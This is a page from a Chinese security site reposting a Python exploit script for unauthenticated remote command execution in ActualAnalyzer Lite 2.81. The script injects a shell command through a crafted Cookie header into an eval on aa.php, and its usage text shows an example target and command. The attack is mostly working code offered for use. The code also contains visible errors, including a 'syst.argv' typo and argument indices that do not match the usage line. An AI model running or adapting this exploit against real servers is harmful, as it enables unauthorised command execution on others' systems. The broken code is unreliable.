首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution
来源:vfocus.net 作者:Harris 发布时间:2014-08-29  
###############################
# ActualAnalyzer  exploit.
# Tested on Lite version 
# We load command into a dummy variable as we only have 6 characters to own the eval 
# but load more as first 2 characters get rm'd.
# We then execute the eval with backticks.
# 11/05/2011
##############################
  
import urllib
import urllib2
import sys
import time
  
  
  
def banner():
    print "     ____                        __              __                  __                     "
    print "    / __/_  ______ _ ____ ______/ /___  ______ _/ /___ _____  ____ _/ /_  ______  ___  _____"
    print "   / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_  / / _ \/ ___/"
    print "  / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/  __/ /    "
    print " /_/  \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/     "
    print "              /_/                                                  /____/                   "
  
  
def usage():
    print " [+] Usage:"
    print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""
    print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""
  
banner()
if len(sys.argv) < 6:
    usage()
    quit()
domain = sys.argv[2]
command = sys.argv[6]
host = syst.argv[4]
  
def commandexploit(domain,host,command):
    url = 'http://' + domain + '/aa.php?anp=' + host 
    data = None
    headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}
    exploit1 = urllib2.Request(url,data,headers)
    exploit2 = urllib2.urlopen(exploit1)
  
commandexploit(domain,host,command)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Plogger 1.0-RC1 - Authenticate
·PhpWiki - Remote Command Execu
·Internet Explorer MS14-029 Mem
·XRMS - Blind SQL Injection and
·Firefox WebIDL Privileged Java
·NRPE 2.15 Remote Command Execu
·glibc Off-by-One NUL Byte gcon
·HTML Help Workshop 1.4 - (SEH)
·Grand MA 300 Fingerprint Reade
·IBM 1754 GCM KVM Multiple Vuln
·SMF Flood Filter Issue
·Baidu Spark Browser v26.5.9999
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved